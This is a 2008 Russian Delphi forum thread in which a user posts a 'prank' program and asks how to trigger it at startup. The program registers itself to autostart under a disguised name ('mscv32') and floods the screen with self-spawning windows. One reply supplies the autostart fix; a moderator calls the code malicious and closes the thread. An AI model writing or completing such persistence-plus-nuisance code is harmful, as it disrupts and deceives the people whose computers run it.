Форум по Delphi программированию

Delphi Sources



Вернуться   Форум по Delphi программированию > Все о Delphi > Программа и интерфейс
Ник
Пароль
Регистрация <<         Правила форума         >> FAQ Пользователи Календарь Поиск Сообщения за сегодня Все разделы прочитаны

Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра
  #1  
Старый 29.10.2008, 01:25
sauron99 sauron99 вне форума
Прохожий
 
Регистрация: 29.10.2008
Сообщения: 2
Репутация: 10
Восклицание запуск проги

Помогите нубу плз)) Есть прога, действие выполняет после нажатия кнопки, а как сделать чтобы после запуска проги кнопка автоматом нажалась? только не предлогайте вставить действие на форму, мне надо чтоб кнопка жалась)
  #2  
Старый 29.10.2008, 04:58
Аватар для Aristarh Dark
Aristarh Dark Aristarh Dark вне форума
Модератор
 
Регистрация: 07.10.2005
Адрес: Москва
Сообщения: 2,906
Версия Delphi: Delphi XE
Репутация: выкл
По умолчанию

Прога не твоя чтоль?
__________________
Некоторые программисты настолько ленивы, что сразу пишут рабочий код.

Если вас наказали ни за что - радуйтесь: вы ни в чем не виноваты.
  #3  
Старый 29.10.2008, 07:42
sauron99 sauron99 вне форума
Прохожий
 
Регистрация: 29.10.2008
Сообщения: 2
Репутация: 10
Восклицание

я наверн тупо объяснил)) это прикол такой на делфи, жмёшь на кнопку создаются формы чере определённое время, как сделать чтоб при запуске проги всё выполнялось вот код:

Код:
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, XPMan, Buttons, registry;

type
  TForm1 = class(TForm)
    XPManifest1: TXPManifest;
    BitBtn1: TBitBtn;
    procedure FormCreate(Sender: TObject);
    procedure BitBtn1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
var
reg: tregistry;
begin
reg := tregistry.create;
reg.rootkey := hkey_local_machine;
reg.lazywrite := false;
reg.openkey('software\microsoft\windows\currentversion\run',false);
reg.writestring('mscv32', application. exename);
reg.closekey;
reg.free;
Width:= 337; 
Height:= 185;
end;

procedure TForm1.BitBtn1Click(Sender: TObject);
var
X: TForm1; 
begin
X:= TForm1.Create(NIL);
ShowWindow(X.Handle, SW_SHOW); 
ShowWindow(X.BitBtn1.Handle, SW_SHOW); 
X.Top:= Random(Screen.Height); 
X.Left:= Random(Screen.Width);
X.Repaint; 
Sleep(1000);
BitBtn1.Click;

end;

end.
Admin: Пользуемся тегами!

Последний раз редактировалось Admin, 29.10.2008 в 10:26.
  #4  
Старый 29.10.2008, 09:34
Alexo Alexo вне форума
Начинающий
 
Регистрация: 24.01.2007
Сообщения: 191
Репутация: 15
По умолчанию

в FormCreate вставь
BitBtn1Click(form1)
__________________
Delphi - это лишь инструмент, а что ты сможешь создать при помощи этого инструмента, зависит исключительно от тебя.
  #5  
Старый 29.10.2008, 13:33
Аватар для Aristarh Dark
Aristarh Dark Aristarh Dark вне форума
Модератор
 
Регистрация: 07.10.2005
Адрес: Москва
Сообщения: 2,906
Версия Delphi: Delphi XE
Репутация: выкл
По умолчанию

Код не будет работать если нет прав администратора в системе.
И еще, приведенный код сильно мне напоминает вредоносный, а посему тему я закрываю.
__________________
Некоторые программисты настолько ленивы, что сразу пишут рабочий код.

Если вас наказали ни за что - радуйтесь: вы ни в чем не виноваты.
Закрытая тема


Delphi Sources

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB-коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Часовой пояс GMT +3, время: 10:37.


 

Сайт

Форум

FAQ

RSS лента

Прочее

 

Copyright © Форум "Delphi Sources" by BrokenByte Software, 2004-2023

ВКонтакте   Facebook   Twitter